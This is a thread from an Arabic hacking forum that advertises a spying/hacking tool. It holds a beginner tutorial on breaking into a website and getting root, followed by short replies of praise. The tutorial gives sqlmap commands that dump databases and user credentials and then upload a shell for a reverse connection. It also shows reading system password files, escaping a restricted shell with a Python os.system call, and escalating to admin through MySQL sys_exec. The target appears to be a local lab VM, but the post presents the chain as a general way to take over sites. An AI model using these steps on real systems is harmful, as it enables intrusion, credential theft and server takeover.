1. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
الكاتب : One MaN | المشاهدات : 635 | الردود : 13
  1. One MaN Developer

    الأنتساب:
    ‏22 أغسطس 2012
    المشاركات:
    86
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    PaLsTiNe - GaZa
    بسم الله الرحمن الرحيم

    اللهم انا نسالك علما نافع

    اللهم علمنا ماينفعنا وانفعنا بما علمتنا

    اليوم موضوعي بسيط للمبتدئين والطريق لاختراق الموقع والحصول على الروت

    بسم الله الرحمن الرحيم

    اول شي نبدا فيه هو فحص الاي بي بالان ماب عشان نشوف الخدمات اللي على الموقع

    [​IMG]

    مثل ماهو واضح الخدمات اللي شغاله ونقدر نشوف المنفذ 80 شغال يعني عليه موقع نفتح الموقع ونشوف وش مركب عليه

    [​IMG]

    نجرب علنا نلقا ثغرة في الموقع

    [​IMG]

    الحمدلله احتمال ثغرة سيكول انجكشن نجرب بالاداة sqlmap ونشوف وش النتيجة

    [​IMG]

    فعلا الثغرة موجودة وطلعت لنا قواعد البيانات

    الامر المستخدم


    كود PHP:
    sqlmap -"http://192.168.56.101/index.php" --forms --dbs

    نحاول نجيب كلمة المرور واسم المستخدم بنفس الاداة

    [​IMG]

    الامر المستخدم


    كود PHP:
    sqlmap -"http://192.168.56.101/index.php" --forms -D members -T members --dump
    نجرب نخش ونشوف يمكن نلقا مركز رفع

    [​IMG]

    للاسف مافيه شي

    نرجع نجرب الاداة nikto ونشوف وش النتيجة

    [​IMG]

    لقينا مجلد images وغالبا مايكون تصريحه قابل للكتابة نجرع sqlmap ونحاول نتصل اتصال عكسي

    [​IMG]

    لاحظوا المجلد اللي رافع عليه الشل وان شاء الله يقبل

    [​IMG]

    الحمدلله تم رفع الشل والاتصال

    الان نبي نشوف من اليوزرات ومن اللي له صلاحية الادمن

    ننفذ الامر cat /etc/passwd

    [​IMG]

    نشوف اليوزرات موجوده تحت وهي


    [SQL]loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
    john:x:1001:1001:,,,:/home/john:/bin/kshell
    robert:x:1002:1002:,,,:/home/robert:/bin/kshell[/SQL]


    طيب نشوف من في قروب الادمن منهم

    cat /etc/group

    [​IMG]

    نشوف اليوزر loneferret مضاف في قروب الادمن

    الان نحاول نتصل بقاعدة البيانات ونحاول نحط اليوزر جون اللي معنا الباسوورد تبعه في قروب الادمن

    نشوف

    [​IMG]

    كتبت الامر هذا عشان اشوف اليوزر والباسوورد المستخدم في قاعدة البيانات نستخدم المعلومات هذي للاتصال

    نتصل عن طريق البورت 22 من البيوتي او ssh اللي حاب

    [​IMG]

    الحمدلله الاتصال ناجح

    وكتبت الامر


    كود PHP:
    echo __import__('os').system("/bin/bash")

    لان الشل فيه ثغرة وبكذا نقدر نستخدمه كاستخدام الشل المحلي

    نخش على قاعدة البيانات

    [​IMG]

    الان ننفذ الامر


    كود PHP:
    select sys_exec('usermod -a -G admin john')

    [​IMG]

    نطلع من قاعدة البيانات ونشوف وش النتيجة

    [​IMG]

    الحمدلله تم ترويت السيرفر

    وهذي احدى الطرق والسيرفر فيه عدة ثغرات تقدر تجيب منها روت

    واعذروني على الشرح السريع​
     
  2. BLaCk HoLe Developer

    الأنتساب:
    ‏9 أغسطس 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    In K.S.A
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    بارك الله فيك
    ونتظر منك الجديد
     
  3. Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,783
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    \عاشت الايادي مبدع شرح كافي ووافي عشت:ُeُe$1:\
     
  4. D3VIL H4CK3R Developer

    الأنتساب:
    ‏4 مايو 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 8
    اللغة البرمجية:
    HTML
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافيه ... تسلم ايديك ي حبيبي
     
  5. Black-Heart V • I • P

    الأنتساب:
    ‏24 مارس 2014
    المشاركات:
    102
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الإقامة:
    أطهر البقاع
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    YouTube:
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    بارك الله فيك حبيبي وشرح رائع ومفهوم
     
  6. HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    عاشت ايدك اخوي :{1!}:
     
  7. AlKOrtanY Developer

    الأنتساب:
    ‏24 مايو 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    Linux
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافيه اخوي
     
  8. -AL SenatoOoR- V • I • P

    الأنتساب:
    ‏14 أغسطس 2014
    المشاركات:
    808
    الإعجابات المتلقاة:
    32
    نقاط الجائزة:
    435
    الجنس:
    ذكر
    الإقامة:
    [[ الـــعرآق الــــعظيم ]]
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    عاشت ايدك يابطل استمر [​IMG]
    شرح مفوهم ومتعوب عليه ايضأ تم الوشم {1!9}
    لاتحرمنا من ابداعك:{3!}:​
     
  9. MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافية
     
  10. Resident Evil Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    47
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    20
    الإقامة:
    my home
    نظام التشغيل:
    Linux
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    تسلم لي على الشرح الجميل والمفيد
     

مشاركة هذه الصفحة